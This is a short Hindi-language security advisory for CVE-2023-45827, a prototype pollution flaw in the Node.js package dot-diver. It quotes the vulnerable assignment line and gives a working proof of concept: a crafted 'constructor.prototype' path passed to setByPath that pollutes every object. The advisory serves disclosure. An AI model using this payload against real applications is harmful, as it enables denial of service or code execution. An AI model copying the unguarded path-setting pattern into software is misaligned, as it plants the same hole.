
pp
CVE-2023-45827
CVSS : 9.8
नवंबर 3, 2023
node.js पैकेज में प्रोटोटाइप प्रदूषण
rebob परियोजना के भाग के रूप में
यह dot-diver में एक प्रोटोटाइप प्रदूषण (PP) भेद्यता है। इससे RCE हो सकता है।
कमजोर कोड
//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277
//eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
objectToSet[lastKey] = value
प्रूफ ऑफ कॉन्सेप्ट
import { getByPath, setByPath } from '@clickbar/dot-diver'
console.log({}.polluted); // undefined
setByPath({},'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // foo
यह प्रोटोटाइप प्रदूषण (PP) है और इससे DoS, RCE, आदि हो सकता है।